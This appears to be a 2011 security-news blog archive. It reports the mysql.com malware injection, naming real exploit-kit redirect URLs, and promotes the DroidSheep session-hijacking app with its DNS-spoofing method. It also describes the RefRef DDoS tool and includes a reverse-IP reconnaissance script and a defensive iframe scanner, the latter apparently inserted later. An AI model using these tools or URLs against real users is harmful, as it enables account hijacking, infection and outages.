Monday 26 September 2011

Mysql.com Hacked , Infected with JavaScript Malware



mysql.com has been hacked and is currently serving malware to its visitors, according to a report by Armorize. The company detected the malware using its malware monitoring platform, HackAlert. The mysql.com website has been injected with a script that generates an iFrame, which redirects visitors to http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php, where the BlackHole exploit pack is hosted.


How Does The Injection Work


Step 1: http://www.mysql.com

Causes the visiting browser to load the following:


Step 2: http://mysql.com/common/js/s_code_remote.js?ver=20091011 (don't visit it now)

This is the injection point. You can find the entire content of the .js file here.


The Infection Section



Step 3:  http://falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/

Serves a 302 redirect to Step 4.

Step 4: http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php

This domain hosts the BlackHole exploit pack. It exploits the visitor's browsing platform (the browser and browser plugins such as Adobe Flash, Adobe PDF, Java, ...), and upon successful exploitation it permanently installs a piece of malware on the visitor's machine without the visitor's knowledge. The visitor doesn't need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform results in an infection.

Sucuri Security researchers have also confirmed this. According to them, "the site has been compromised via JavaScript malware that infects a web site through a compromised desktop (with virus), where it steals any stored password from the FTP client and uses that to attack the site."
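A defender-side check for the kind of injection described above, added here as an example (it is not code from Armorize, Sucuri or the original post): it scans page or script content for iframes whose src points outside the site's own domain and reports whether each one is hidden. The sample content and all hostnames in it are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample in the shape of the injected block described above: a script
# that builds one hidden iframe via the DOM and writes two more as HTML. Hostnames
# are placeholders, not the ones from the report.
SAMPLE_JS = r'''
var s = document.createElement("iframe");
s.src = "http://attacker.example/info/in.cgi?5&ab_iframe=1";
s.width = 1; s.height = 1; s.style.visibility = "hidden";
document.body.appendChild(s);
document.write('<iframe src="http://www.mysql.example/common/legit.html" width="600" height="400"></iframe>');
document.write("<iframe src='http://cdn.attacker.example/main.php' style='display:none' width='0' height='0'></iframe>");
'''

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
STYLE_ATTR = re.compile(r"""\bstyle\s*=\s*["']([^"']*)["']""", re.I)
DIM_ATTR = re.compile(r"""\b(width|height)\s*=\s*["']?(\d+)""", re.I)
# iframes built through the DOM leave no <iframe> tag; catch the .src assignment instead
DOM_SRC = re.compile(r"""\.src\s*=\s*["'](https?://[^"']+)["']""", re.I)


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def same_site(host, site):
    site = site.lower()
    return host == site or host.endswith("." + site)


def tag_is_hidden(tag):
    """display:none / visibility:hidden, or a 0x0 / 1x1 frame."""
    style = " ".join(STYLE_ATTR.findall(tag)).replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return any(int(v) <= 1 for _, v in DIM_ATTR.findall(tag))


def find_foreign_iframes(content, site):
    """Report every iframe whose src points outside `site`.
    hidden is True/False for <iframe> tags and None for DOM-built frames,
    whose styling is set in separate statements and is not analysed here."""
    findings = []
    for tag in IFRAME_TAG.findall(content):
        m = SRC_ATTR.search(tag)
        if not m:
            continue
        host = host_of(m.group(1))
        if host and not same_site(host, site):
            findings.append({"src": m.group(1), "host": host,
                             "hidden": tag_is_hidden(tag), "via": "tag"})
    for url in DOM_SRC.findall(content):
        host = host_of(url)
        if host and not same_site(host, site):
            findings.append({"src": url, "host": host, "hidden": None, "via": "dom"})
    return findings


if __name__ == "__main__":
    for f in find_foreign_iframes(SAMPLE_JS, "mysql.example"):
        flag = "HIDDEN" if f["hidden"] else ("?" if f["hidden"] is None else "visible")
        print(f"{f['via']:3} {flag:7} {f['host']:25} {f['src']}")
```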



[Source]



LulzSec member "Neuron" Tracked Down Via HideMyAss's Logs




One more member of the hacking group LulzSec, known as "Neuron", may be arrested if traced through his use of a British anonymising VPN. This follows the arrest last week of Cody Kretsinger, who was picked up by the FBI last Thursday for allegedly hacking into the Sony Pictures website; he had been identified via his use of HideMyAss's proxy service to disguise his IP address when connecting to the Sony Pictures site.

However, a Pastebin log shows that "Neuron" claims to use HideMyAss's service in order to protect his identity. HideMyAss also posted a lengthy note on the topic on its blog after the news emerged.

HideMyAss: "It first came to our attention when leaked IRC chat logs were released. In these logs participants discussed the various VPN services they use, and it became apparent that some members were using our service. No action was taken; after all, there was no evidence to suggest wrongdoing and nothing to identify which accounts with us they were using. At a later date it came as no surprise to have received a court order asking for information relating to an account associated with some or all of the above cases. As stated in our terms of service and privacy policy our service is not to be used for illegal activity, and as a legitimate company we will cooperate with law enforcement if we receive a court order (equivalent of a subpoena in the US)."

LulzSec is going down #The Fourth Arrest 

Wednesday 21 September 2011

David Beckham's Dead And The Top 5 Twitter Hacks



This morning Twitter lit up with a rumour that David Beckham had died. While it appears to be nothing more than a rumour, it is the latest in a long line of hacks and rumours that spread like wildfire across the social networks. Here are 5 other hacks that have made the front pages…
Topiary, not just a lovely bush but the nickname of one of the super hackers behind Anonymous and LulzSec, is allegedly the 19-year-old arrested in the Shetland Islands this week by British police for crimes against cyberspace. The arrest is closely linked to an enormous investigation alongside the FBI into a denial-of-service attack on the third-party payment service PayPal that took down the site for four days last December. The Anti-Security hacker movement, notoriously sympathetic to Julian Assange, targeted the company after PayPal suspended all donations to WikiLeaks. Following the arrest this week, LulzSec and Anonymous have turned their boycott up a notch, again persuading hundreds of users to close their PayPal accounts.
While Scotland Yard has not confirmed the teenager's identity as Topiary, his usually active Twitter account is now sparse but for the single statement "You cannot arrest an idea." So, with one of the most outspoken advocates of the Anti-Security hacking movement now apparently on lockdown, we take a look at cyber pests' favourite soap-box and target of choice, Twitter. While enormously popular, Twitter is a hacker's delight, having both notoriously vulnerable security and the ability to spread news of a hack like an Australian bush fire.
PayPal
PayPal's shoddy customer service has been the subject of bitter criticism from users, with the website www.paypalsucks.com long established before any Twitter hijacking. But when the UK PayPal account's profile picture was changed to a steaming pile of poop and followers were redirected to the hate website, users instantly smelt a LulzSec rat. However, this turned out not to be the handiwork of a hardcore hacker but that of one particularly enraged customer. So that should make you feel safe giving them all your bank account details.
Britney Spears
If YouTube comments are to be believed, Britney Spears is indeed at the fiery helm of the Illuminati world domination committee, along with every other popstar ever. Complete with a new illiminaughty triangle-plentiful background and profile picture, the hackers tweeted Spears' allegiance to Lucifer to her 3 million plus followers. While many famous Twitter accounts have been broken into, including the obvious prey of uber-celebs Justin Bieber and Lady GaGa, other than lots of capital letters and profanities, Britters' account jacks have been the most imaginative, including when it was famously compromised to announce her own death. Cue a frenzy of hysterical RIP hash-tagging.
Fox News
Again, this beautiful Twitter hijack was initially suspected to be a LulzSec job but was in fact by fellow Internet scamps Scriptkiddies. Both Fox's site and its social networks have been repeatedly attacked by a number of different hacking groups, one time satisfyingly announcing that Fox reporter and everything-o-phobe Bill O'Reilly was gay. The hijack earlier this July is possibly one of the worst egg-on-their-face blunders for Fox, as Scriptkiddies not only tweeted that President Obama had been assassinated, but the rogue messages were not noticed or removed by Fox for nearly ten hours. A favourite punching bag for hacktivists, there's sure to be more Fox fun to come.
Iranian Cyber Army
December 2009, and millions of Twitter users looking to post motivational quotes and share photos of their breakfast shot through a vintage photography filter are instead confronted with an ominous Iranian Cyber Army page. In a drastic attack on Twitter, the radical Shiite hackers were able to re-route the entire site. The hack was said to be in response to Twitter's unwitting yet pivotal role during the unrest in Tehran, where protesters were able to push news out while skirting the Iranian government's media crackdown. It was, sadly, seen by some as interference. While it only KO'd the site for an hour, it stands as Twitter's worst security embarrassment to date.

Sunday 18 September 2011

Install Windows 8 Developer In Vmware

Several versions of Windows 8 Developer Preview are publicly available from Microsoft's Windows Developer Preview downloads. Just pick the one that fits you. The downloaded file is an ISO file; you don't need to burn it to disc.

If you don't have a spare computer to install Windows 8 Developer Preview on, you can install it on your own machine using VMware. First you'll need VMware Workstation 8 or VMware Player 4. The latter is free, but at the moment you can only get it by downloading VMware Workstation 8. Don't worry if you don't have a license; you don't need one, because we will only use the free VMware Player 4. If you want full functionality you can download a trial version. For both downloads you'll need to create an account. Go ahead and download and install VMware Workstation 8 if you have not already.

In this little tutorial I will use VMware Player, but the steps are nearly the same for VMware Workstation. Start VMware Player and click "Create a New Virtual Machine". In the window that pops up, make sure you choose "I will install the operating system later."

Installing-Win8-VMware-1

If you select one of the other options, you'll run into trouble while Windows 8 Developer Preview is installing, because in one of the next screens of the VMware wizard you'll be asked to enter the license key for Windows 8 Developer Preview, which you don't have. You can leave it empty, but the wizard then generates an unattended answer file from your entries, and when Windows 8 Developer Preview installs you'll get the following error: "Windows cannot read the <ProductKey> setting from the unattend answer file".

Installing-Win8-VMware-2

So, let's proceed with the last option and click "Next >". Depending on which version you have downloaded, select "Windows 7" or "Windows 7 x64" as the operating system. I downloaded the 64-bit version, so I chose "Windows 7 x64".

Installing-Win8-VMware-3

Enter a virtual machine name in the next step, for instance "Windows 8 Developer Preview", and set the location of your virtual machine. I did not change anything in the next steps of the wizard, but you can choose the maximum disk size (default 60GB) and whether to split the virtual disk or not. If you want to adjust the default allocated memory (1GB) you'll need to click "Customize Hardware…" in the last step to change it. This is my summary screen:

Installing-Win8-VMware-4

Click "Finish" and select the newly created virtual machine in VMware Player. Open the Virtual Machine Settings by clicking "Edit virtual machine settings" and select "CD/DVD (IDE)" in the device list. Make sure "Connect at power on" is checked and that you point it to the downloaded ISO file.

Installing-Win8-VMware-5

Click "OK" and power on the virtual machine. The Windows 8 Developer Preview installation wizard will start. At the end you can enjoy Windows 8 Developer Preview! One more tip: the Metro-style apps will only run if your screen resolution is at least 1024x768 (hardware or virtual machine).

Friday 16 September 2011

Windows Update Can Be Hacked

Yeah, Windows Update can be hacked, according to Comodohacker.

Comodohacker: I can hack Windows Update

Hackable??

Following on from the recent hack attack carried out against Dutch security specialist DigiNotar, it would appear that the notorious hacker Comodohacker is setting his or her sights on a significantly bigger target.
Moreover, while claiming to be “so smart, sharp, dangerous [and] powerful”, the hacker has offered up a statement conflicting directly with Microsoft’s recent insistence that its Windows Update system cannot be compromised.
“I’m able to issue Windows updates—Microsoft’s statement about Windows Update and that I can’t issue such [an] update is totally false,” the hacker wrote via Pastebin. “Simply I can issue updates via Windows Update!”
“I already reversed ENTIRE Windows update protocol, how it reads XMLs via SSL, which includes URL, KB no, SHA-1 hash of file for each update, how it verifies that downloaded file is signed using WinVerifyTrust API,” the post boasted.
Although Microsoft remains staunch in its belief that Windows Update cannot be circumvented “even to an attacker with a fraudulent certificate”, hundreds of millions of unwitting users could face a flood of malware if Comodohacker is able to make good on the claim.
“Attackers are not able to leverage a fraudulent Windows Update certificate to install malware via the Windows Update servers”, wrote the software giant via its official blog.
“The Windows Update client will only install binary payloads signed by the actual Microsoft root CA certificate, which is issued and secured by Microsoft,” it added.

Thursday 15 September 2011

DROIDSHEEP

DROIDSHEEP SESSION HIJACKING ANDROID APPLICATION: 
DroidSheep is a free alternative to FaceNiff and is available for free from the DroidSheep website. It is a one-click session hijacking tool that supports:

- amazon.de
- facebook.com
- flickr.com
- twitter.com
- linkedin.com
- yahoo.com
- live.com
- google.de (only the non-encrypted services like "maps")


Limitations of Droidsheep


DroidSheep now supports OPEN, WEP, WPA and WPA2 secured networks.
For WPA/WPA2 it uses a DNS-spoofing attack.
DNS spoofing here means it makes all devices within the network think the DroidSheep device is the router, so they send their data to it. This might have an impact on the network, cause connection problems or bandwidth limitations, and it can be spotted. DroidSheep's passive capture cannot be spotted in that way, because it only reads the packets sent over the Wi-Fi; instead of dismissing them, it uses the data.

What do you need to run DroidSheep?
- You need an Android-powered device running at least Android 2.1
- You need root access on your phone (link)
- You need DroidSheep :-) (you can get it in the "GET IT" section)


You can download the DroidSheep Android application here.

Tuesday 13 September 2011

Hackers Bring Down Linux Websites




A number of Linux websites, including LinuxFoundation.org and Linux.com, have been pulled offline after a security breach.

The breach is believed to be related to the hack of the Kernel.org website that is home to the Linux Project, nearly two weeks ago.

In a holding message on its website, the Linux Foundation said that it had discovered a security breach on Sept. 8, which led to its taking down the Linux websites and their subdomains for maintenance.

The Linux Foundation infrastructure also supports services such as Open Printing and Linux Mark. However, it does not house the Linux kernel or its code repositories.

"The Linux Foundation made this decision in the interest of extreme caution and security best practices.

"We believe this breach was connected to the intrusion on kernel.org," the statement on Linux Foundation said.

While the Linux Foundation is restoring services, it warned users that their passwords may be compromised, and advised them to change them urgently:

"As with any intrusion and as a matter of caution, you should consider the passwords and SSH keys that you have used on these sites compromised. If you have reused these passwords on other sites, please change them immediately."

The foundation added that it is auditing all its systems, and will provide an updated statement when it has more information.

Users who want to find out more about the issue can contact the foundation on info@linuxfoundation.org.

WikiLeaks knocked offline by Anonymous; RefRef due Sept. 17

wikileaks.org taken offline during RefRef test

On Tuesday, WikiLeaks.org crashed under what the organization called a heavy cyberattack. However, the developer behind RefRef, an application created for those associating with Anonymous to use instead of LOIC, said that WikiLeaks was taken offline during a test of the new tool. RefRef will be tested again on Wednesday, before it is released on September 17.
RefRef is a platform-neutral tool, leveraging JavaScript and vulnerabilities within SQL to create a devastating impact on the targeted website. In late July, an Anon on IRC was promoting the tool, explaining to those in a room frequented by journalists that RefRef is pure JavaScript and uses the target site's own processing power against itself. In the end, the server succumbs to resource exhaustion due to RefRef's usage.
As it turns out, the attack is launched client side, and will send a separate script in the connection request made to the target server. This request is actually the exploit itself, and once the server renders the code, it will continue to render it until crashing. In essence, the stronger the server, the faster it crashes. All from a JavaScript file that is no more than 52 lines of code.
At the time, The Tech Herald was able to get the Anon to open up some on the tool itself. "Imagine giving a large beast a simple carrot, [and then] watching the beast choke itself to death," explained the Anon promoting the tool.
Testing the code in July, a run of 17 seconds led to a 42 minute outage on Pastebin.com, which was confirmed by Pastebin on Twitter. The test on Tuesday, which targeted WikiLeaks.org, lasted just 72 seconds.
“WikiLeaks is currently under heavy attack. In order to fully protect the CableGate archives, we ask you to mirror it again,” the organization told Twitter followers.
It was assumed by the AP and other news organizations that WikiLeaks was down due to the controversy surrounding the latest batch of diplomatic cables.
As this was being written, the developers tested RefRef again, this time targeting 4Chan.org. The imageboard was offline for just a few minutes. This test lasted 16 seconds. StormFront.org was also an unwilling test subject. A 12 second test knocked the site offline for about two minutes.
In July, the Anon who announced RefRef told The Tech Herald that the tool itself exploits server vulnerabilities, and will work as long as the target server supports JavaScript and some type of SQL. Asked if the vulnerability being exploited could be patched, the Anon responded that it could, but added that administrators would have to “mass-patch” a file that actually affects many services.
As it turns out, this was incorrect. Originally, patching was unlikely to stop RefRef because, “most SQL servers are pulling from a master SQL host” and the tool itself targets “one of the most common SQL services, but also one of the most widespread,” the Anon added.
However, this has changed. Early Wednesday, the Anon who was testing RefRef before its release, said “…it seems they can patch it easily, not having to patch the SQL host.”
So once the SQL patch is released, and there is one coming, the tool itself will be useless. “A SQL patch will be out within a week, so we must all use it on the sites fast,” the Anon explained.
According to statements on Twitter, RefRef will be tested on Wednesday, against a high profile site, before its release to the public on September 17. Administrators wishing to get ahead of the game may want to watch for patch releases this month.

Google Web History Vulnerable to Firesheep Hack


Two researchers have shown how a modified version of the Firesheep Wi-Fi sniffing tool can be used to access most of a victim's Google Web History, a record of everything an individual has searched for.

The core weakness discovered by the proof-of-concept attack devised by Vincent Toubiana and Vincent Verdot lies with what is called a Session ID (SID) cookie, used to identify a user to each service they access while logged in to one of Google's services.

Every time the user accesses an application, the same SID cookie is sent in the clear, and Firesheep captures it from the data sent to and from a PC connected to a non-encrypted public Wi-Fi hotspot.
Because many of Google's services use HTTPS (Gmail, for instance), the attacker has to find a way to get the user to resend this SID over plain HTTP. The most direct method is to set up a rogue access point and then use an iFrame to direct the user's browser to a Google service (such as Alerts) that doesn't use an encrypted channel.

The attack also requires that the user has Google Web History tracking turned on. This is the system that keeps tabs on a user's search history; many people are not even aware it exists, because it is switched on during Google's account setup procedure.

Testing the technique against ten volunteers, the researchers were able to retrieve up to 82 percent of the links visited by them during the test period.

The only current defense against this attack is for users to remain signed out of Google while using a Wi-Fi hotspot, or to set up a personal VPN. Users could also disable Google Web History or purge its contents.

However, Toubiana and Verdot also note that "some issues cannot be addressed by users and require a modification of Google's cookie policy." The major worry remains the expansion of Google's tracking to other types of data in its Google+ service. "As Google is taking steps to include social indicators in result personalization, user's social network could soon be exposed."

Firesheep is a browser plug-in published a year ago by security developer Eric Butler to highlight security vulnerabilities in the way cookies for sites such as Facebook and Twitter were being exchanged across open Wi-Fi links without HTTPS turned on. Although not a new issue, Firesheep showed how easy it was to turn the flaw into a simple tool that could be used by any attacker.

Sunday 11 September 2011

Threats posted on White House Facebook page


Threatening messages have been posted on the White House Facebook page amid heightened alerts surrounding a possible 9/11 terror threat.
"We'll come back U.S.A. One day only 11/9/2011," says one message, featuring a photo of Osama bin Laden, using the date/month formula to reference Sept. 11.
"We'll come to u white house sooooooooooon," says another.
"We'll come back 11/9/2011 to kill u all," a third posting reads.
New York City and Washington, D.C., have tightened security after intelligence collected from overseas indicated a possible threat involving car bombs, as well as threats to bridges and tunnels. The information indicated that three men would travel from Pakistan to the U.S. to carry out an attack.
The threat has been described as "specific" and "credible" but not confirmed.
FBI Joint Terrorism Task Force officials across the country have been conducting interviews to eliminate hundreds of people who could match travel patterns of terrorists.

A government official stresses security officials do not know if any terror suspect entered the United States at all, and the questioning of travelers across the country is precautionary and is meant to rule people out.
Airline passenger arrival records are being checked against the few vague details the source offered, including age range, approximate heights, fragments of names, and travel patterns.
That chore is complicated by the possibility that the men may have been smuggled into and out of Pakistan, leaving no record they were ever there.
Law enforcement officials say hundreds of recent arrivals have already been checked and ruled out. Some of that can be done merely by reference to the records, but in other cases, in-person interviews are being conducted.
And around New York and Washington, officials say the FBI has found no sign of unusual purchases of chemicals needed to make car bombs.
A joint FBI-Department of Homeland Security bulletin from Thursday said al-Qaida may be considering attacks that use improvised explosives packed in vehicles, similar to the "attempted attack on Times square" by Faisal Shahzad in May 2010.
Al-Qaida may be aiming to avenge the death of Osama bin Laden and other key terror figures, the bulletin said.
Officials were also investigating information about two construction vans stolen along roads in Queens on Sept. 1 or 2. A government official says the theft may have been from somebody working with the van, theorizing that it may be an inside job.
Along with the vans, $70,000 in construction equipment was reported stolen.
The alleged terror threat by al-Qaida against New York City and Washington, D.C., has brought additional police officers, vehicle checkpoints, and subway bag checks.

Finding domains on targeted host | Reverse IP lookup



"Reverse IP lookup" is a very useful concept for penetration testers who want to find out which domains are hosted on a targeted host. Using it you can find the number of domains hosted on a server. Let's say s4ur4v.com is a site on a server with the address 1.1.1.1; when you do a reverse IP lookup on that server you will find the other domains hosted on the same server.

What's the theory behind this?
Every web server is assigned a unique IP address. If a web server is running a website, the IP address of the site will be the same as that of the server. If multiple domains are hosted on the same web server, they will all share the server's IP address. Reverse IP lookup uses this fact: starting from the target's IP address, we ask the lookup process which domains point at it.

How to do a Reverse IP Lookup?

There are lots of ready-made sites that let you do a reverse IP lookup, such as yougetsignal:

- Go to http://www.yougetsignal.com/
- Type the server address / website URL
- Click on check and, bingo, you get the number of domains on the server you looked up


Next I will show you how to do this with a Python script that uses Bing's API to find our dinner (you can also use DRIL, which works the same way). Note that the Bing API v2 endpoint the script talks to (api.bing.net/xml.aspx) has since been retired, so to run it today you would point the request at a current search API; the parsing and de-duplication logic stays the same.
import http.client
import socket
import sys
from xml.dom.minidom import parseString

if len(sys.argv) == 2:
    AppId = '1734E2C92CA63FAA596335295B09CF1D0B5C6161'   # Bing API v2 application id
    domain = sys.argv[1]
    sites = [domain]
    ip = socket.gethostbyname(domain)                  # the shared server address
    offset = 0                                          # start at the first page of results
    while offset < 300:                                 # up to 300 results, 50 per request
        uri = ("/xml.aspx?AppId=%s&Query=ip:%s&Sources=Web&Version=2.0&Market=en-us"
               "&Adult=Moderate&Options=EnableHighlighting&Web.Count=50&Web.Offset=%s"
               "&Web.Options=DisableQueryAlterations" % (AppId, ip, offset))
        conn = http.client.HTTPConnection("api.bing.net")
        conn.request("GET", uri)
        res = conn.getresponse()
        data = res.read()
        conn.close()
        xmldoc = parseString(data)
        nameEls = xmldoc.getElementsByTagName('web:DisplayUrl')
        for el in nameEls:
            if not el.childNodes:                       # skip empty elements
                continue
            temp = el.childNodes[0].nodeValue
            temp = temp.split("/")[0]                   # keep only the host part of the URL
            if temp.startswith('www.'):
                temp = temp[4:]                         # normalise www.example.com to example.com
            if temp not in sites:
                sites.append(temp)
        offset += 50
    print("\n")
    print("Total: %d domain(s)\n" % len(sites))
    for i in sites:
        print(i)
    print("\n")
else:
    print("\n\n")
    print("=====================================")
    print("Usage: $ python reverse.py domain.com")
    print("Ex: $ python reverse.py hackersbay.in")
    print("=====================================")
    print("\n\n")

Windows users, make sure you have Python installed before running this script. I am going to show it using BackTrack.

- Copy the above script into a file and name it reverse.py
- Change into the directory where you saved the file, e.g. cd /dir
- To execute the script, just run python reverse.py and it will show you how to do the rest :D

root@bt:~# cd /pentest 

root@bt:/pentest# python reverse.py 

=====================================
Usage: $ python reverse.py domain.com

Ex: $ python reverse.py enhack.net   
=====================================
root@bt:/pentest# python reverse.py davunit8.org

Total: 103 domain(s)


Missed something? Feel free to comment.